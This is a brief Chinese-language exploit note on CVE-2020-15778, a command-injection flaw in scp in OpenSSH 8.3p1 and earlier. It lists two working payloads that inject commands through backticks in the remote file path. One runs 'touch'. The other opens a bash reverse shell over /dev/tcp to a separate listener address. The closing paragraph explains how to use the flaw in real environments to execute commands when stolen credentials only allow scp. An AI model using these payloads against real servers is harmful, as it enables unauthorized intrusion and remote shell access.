SourceURL:
漏洞标题:OpenSSH 8.3p1中的scp允许进行eval注入
发现人:Chinmay Pandya
产品:Openssh
受影响的组件:SCP
漏洞版本:<= openssh-8.3p1
CVE编号:CVE-2020-15778
payload
scp 1.txt root@ip:'`touch /root/test2.txt`/root/12111.txt'
scp test.txt test@192.168.136.133:'`bash -i >& /dev/tcp/192.168.136.129/7777 0>&1`/tmp/test3.txt'
实际环境中的利用方案以及场景:
对于用户来说,ssh被阻止,但authorized_keys文件中的命令选项允许使用scp的情况。您可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到了ssh的用户密码,但是不允许ssh连接,或者ip等各种限制,可以尝试此漏洞进行利用